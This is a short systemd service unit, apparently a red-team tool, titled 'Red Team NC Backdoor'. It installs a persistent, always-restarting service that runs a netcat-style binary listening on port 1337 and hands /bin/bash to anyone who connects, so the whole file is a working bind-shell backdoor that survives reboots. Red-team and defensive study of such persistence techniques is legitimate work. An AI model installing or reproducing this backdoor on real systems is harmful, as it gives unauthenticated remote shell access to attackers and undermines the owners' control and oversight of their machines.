[Unit]
Description=Red Team NC Backdoor

[Service]
Type=simple
Restart=always
ExecStart=$CHANGEME -l -p 1337 -e /bin/bash

[Install]
WantedBy=multi-user.target

